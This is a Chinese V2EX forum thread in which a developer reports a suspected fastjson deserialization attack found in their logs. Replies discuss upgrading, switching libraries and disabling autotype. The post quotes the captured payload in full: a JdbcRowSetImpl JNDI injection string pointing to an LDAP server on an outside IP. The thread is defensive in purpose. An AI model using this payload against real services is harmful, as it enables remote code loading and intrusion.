服务疑似被尝试 fastjson 漏洞攻击

2022-05-06 16:57:53 +08:00
 moe3000

日志中查到有人发送异常参数至接口

{"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}}

查了下可能是 fastjson 反序列化攻击,目前项目使用的 fastjson 版本是 1.2.73 ,好像不在攻击范围内,请问下还有其他防御措施吗

3720 次点击
所在节点    Java
13 条回复
Jooooooooo
2022-05-06 16:59:28 +08:00
换 jackson
moe3000
2022-05-06 17:00:23 +08:00
@Jooooooooo 下个、下个版本一定
BBCCBB
2022-05-06 17:02:58 +08:00
不知道关掉这个按 @type 来反序列化的功能能不能防止这个问题? 就 http 请求的参数的反序列化用不到这个 @type 的功能.
bthulu
2022-05-06 17:06:39 +08:00
不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题.
clf
2022-05-06 17:10:19 +08:00
公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。
RainCats
2022-05-06 17:40:06 +08:00
@clf 有点极端了吧,完全不用阿里系的东西
clf
2022-05-06 17:54:00 +08:00
@RainCats #6 也用的,但只用开源基金会支持的,阿里已经捐给 apache 的都是 apache 的包名。主要是不用 fastjson
ufan0
2022-05-06 21:46:01 +08:00
@clf #7 咱公司上海有开放招聘吗?想投!!!
fff333
2022-05-06 21:48:35 +08:00
@moe3000 gson
banmuyutian
2022-05-07 10:37:10 +08:00
@clf #5
我现在还用的阿里项目仅剩下 easyexcel
houzhishi
2022-05-07 13:38:00 +08:00
脚本小子在瞎跑,不用太在意,结合业务看是否可以关闭自省 @type
clf
2022-05-07 14:46:09 +08:00
@banmuyutian 我们是直接用的 POI ,和基础服务的数据结构(比如表单等)封装了接口。
xiaopigfly
2022-05-07 14:53:52 +08:00
问题不大,只要放到公网就会有人扫描。正常的。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/851201

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX